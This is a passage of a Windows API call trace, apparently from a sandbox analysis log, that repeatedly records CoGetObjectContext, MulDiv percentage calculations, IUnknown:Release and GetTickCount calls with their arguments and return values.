(in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.669] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.669] MulDiv (nNumber=7026, nNumerator=100, nDenominator=41531) returned 17 [0014.669] IUnknown:Release (This=0x371480) returned 0x1 [0014.669] GetTickCount () returned 0x1389c [0014.670] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.674] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.675] MulDiv (nNumber=7026, nNumerator=100, nDenominator=42776) returned 16 [0014.675] IUnknown:Release (This=0x371480) returned 0x1 [0014.675] GetTickCount () returned 0x1389c [0014.676] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.680] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.681] MulDiv (nNumber=7026, nNumerator=100, nDenominator=44021) returned 16 [0014.681] IUnknown:Release (This=0x371480) returned 0x1 [0014.681] GetTickCount () returned 0x138ac [0014.681] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.684] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.685] MulDiv (nNumber=7026, nNumerator=100, nDenominator=45266) returned 16 [0014.685] IUnknown:Release (This=0x371480) returned 0x1 [0014.685] GetTickCount () returned 0x138ac [0014.685] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.689] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.689] MulDiv (nNumber=7026, nNumerator=100, nDenominator=46511) returned 15 [0014.689] IUnknown:Release (This=0x371480) returned 0x1 [0014.689] GetTickCount () returned 0x138ac [0014.690] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.706] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.709] MulDiv (nNumber=14046, nNumerator=100, nDenominator=55946) returned 25 [0014.709] IUnknown:Release (This=0x371480) returned 0x1 [0014.709] GetTickCount () returned 0x138cb [0014.710] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.719] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.722] MulDiv (nNumber=14046, nNumerator=100, nDenominator=58361) returned 24 [0014.722] IUnknown:Release (This=0x371480) returned 0x1 [0014.722] GetTickCount () returned 0x138cb [0014.723] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.736] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.740] MulDiv (nNumber=14046, nNumerator=100, nDenominator=60776) returned 23 [0014.740] IUnknown:Release (This=0x371480) returned 0x1 [0014.740] GetTickCount () returned 0x138ea [0014.740] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.750] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.753] MulDiv (nNumber=14046, nNumerator=100, nDenominator=63191) returned 22 [0014.753] IUnknown:Release (This=0x371480) returned 0x1 [0014.753] GetTickCount () returned 0x138ea [0014.754] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.765] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.768] MulDiv (nNumber=14046, nNumerator=100, nDenominator=65606) returned 21 [0014.768] IUnknown:Release (This=0x371480) returned 0x1 [0014.768] GetTickCount () returned 0x138fa [0014.769] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.779] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.783] MulDiv (nNumber=14046, nNumerator=100, nDenominator=68021) returned 21 [0014.783] IUnknown:Release (This=0x371480) returned 0x1 [0014.783] GetTickCount () returned 0x13909 [0014.783] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.795] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.798] MulDiv (nNumber=14046, nNumerator=100, nDenominator=70436) returned 20 [0014.798] IUnknown:Release (This=0x371480) returned 0x1 [0014.798] GetTickCount () returned 0x13919 [0014.799] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.811] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.814] MulDiv (nNumber=14046, nNumerator=100, nDenominator=72851) returned 19 [0014.814] IUnknown:Release (This=0x371480) returned 0x1 [0014.814] GetTickCount () returned 0x13928 [0014.815] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.827] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.830] MulDiv (nNumber=14046, nNumerator=100, nDenominator=75266) returned 19 [0014.830] IUnknown:Release (This=0x371480) returned 0x1 [0014.830] GetTickCount () returned 0x13938 [0014.831] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.845] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.848] MulDiv (nNumber=14046, nNumerator=100, nDenominator=77681) returned 18 [0014.848] IUnknown:Release (This=0x371480) returned 0x1 [0014.848] GetTickCount () returned 0x13957 [0014.849] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.863] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.866] MulDiv (nNumber=14046, nNumerator=100, nDenominator=80096) returned 18 [0014.866] IUnknown:Release (This=0x371480) returned 0x1 [0014.866] GetTickCount () returned 0x13967 [0014.867] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.880] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.881] MulDiv (nNumber=14046, nNumerator=100, nDenominator=82511) returned 17 [0014.881] IUnknown:Release (This=0x371480) returned 0x1 [0014.881] GetTickCount () returned 0x13976 [0014.881] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.888] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.889] MulDiv (nNumber=14046, nNumerator=100, nDenominator=84926) returned 17 [0014.889] IUnknown:Release (This=0x371480) returned 0x1 [0014.889] GetTickCount () returned 0x13976 [0014.890] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.897] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.898] MulDiv (nNumber=14046, nNumerator=100, nDenominator=87341) returned 16 [0014.898] IUnknown:Release (This=0x371480) returned 0x1 [0014.898] GetTickCount () returned 0x13986 [0014.899] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.907] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.908] MulDiv (nNumber=14046, nNumerator=100, nDenominator=89756) returned 16 [0014.908] IUnknown:Release (This=0x371480) returned 0x1 [0014.908] GetTickCount () returned 0x13986 [0014.909] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.915] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.916] MulDiv (nNumber=14046, nNumerator=100, nDenominator=92171) returned 15 [0014.916] IUnknown:Release (This=0x371480) returned 0x1 [0014.916] GetTickCount () returned 0x13996 [0014.917] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.960] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.967] MulDiv (nNumber=28092, nNumerator=100, nDenominator=110973) returned 25 [0014.967] IUnknown:Release (This=0x371480) returned 0x1 [0014.967] GetTickCount () returned 0x139c4 [0014.968] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.991] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.998] MulDiv (nNumber=28092, nNumerator=100, nDenominator=115729) returned 24 [0014.998] IUnknown:Release (This=0x371480) returned 0x1 [0014.998] GetTickCount () returned 0x139e4 [0014.999] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.020] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.026] MulDiv (nNumber=28092, nNumerator=100, nDenominator=120485) returned 23 [0015.026] IUnknown:Release (This=0x371480) returned 0x1 [0015.026] GetTickCount () returned 0x13a03 [0015.028] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.051] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.057] MulDiv (nNumber=28092, nNumerator=100, nDenominator=125241) returned 22 [0015.057] IUnknown:Release (This=0x371480) returned 0x1 [0015.057] GetTickCount () returned 0x13a22 [0015.058] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.080] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.087] MulDiv (nNumber=28092, nNumerator=100, nDenominator=129997) returned 22 [0015.087] IUnknown:Release (This=0x371480) returned 0x1 [0015.087] GetTickCount () returned 0x13a41 [0015.088] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.113] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.119] MulDiv (nNumber=28092, nNumerator=100, nDenominator=134753) returned 21 [0015.119] IUnknown:Release (This=0x371480) returned 0x1 [0015.119] GetTickCount () returned 0x13a60 [0015.121] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.142] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.149] MulDiv (nNumber=28092, nNumerator=100, nDenominator=139509) returned 20 [0015.149] IUnknown:Release (This=0x371480) returned 0x1 [0015.149] GetTickCount () returned 0x13a80 [0015.150] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.172] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.179] MulDiv (nNumber=28092, nNumerator=100, nDenominator=144265) returned 19 [0015.179] IUnknown:Release (This=0x371480) returned 0x1 [0015.179] GetTickCount () returned 0x13a9f [0015.181] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.204] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.211] MulDiv (nNumber=28092, nNumerator=100, nDenominator=149021) returned 19 [0015.211] IUnknown:Release (This=0x371480) returned 0x1 [0015.211] GetTickCount () returned 0x13abe [0015.212] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.235] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.244] MulDiv (nNumber=28092, nNumerator=100, nDenominator=153777) returned 18 [0015.244] IUnknown:Release (This=0x371480) returned 0x1 [0015.244] GetTickCount () returned 0x13add [0015.246] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.273] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.280] MulDiv (nNumber=28092, nNumerator=100, nDenominator=158533) returned 18 [0015.280] IUnknown:Release (This=0x371480) returned 0x1 [0015.280] GetTickCount () returned 0x13afc [0015.282] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.310] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.317] MulDiv (nNumber=28092, nNumerator=100, nDenominator=163289) returned 17 [0015.317] IUnknown:Release (This=0x371480) returned 0x1 [0015.317] GetTickCount () returned 0x13b2b [0015.319] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.344] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.351] MulDiv (nNumber=28092, nNumerator=100, nDenominator=168045) returned 17 [0015.351] IUnknown:Release (This=0x371480) returned 0x1 [0015.351] GetTickCount () returned 0x13b4a [0015.353] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.392] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.399] MulDiv (nNumber=28092, nNumerator=100, nDenominator=172801) returned 16 [0015.399] IUnknown:Release (This=0x371480) returned 0x1 [0015.399] GetTickCount () returned 0x13b79 [0015.402] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.445] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0015.448] MulDiv (nNumber=28092, nNumerator=100, nDenominator=177557) returned 16 [0015.448] 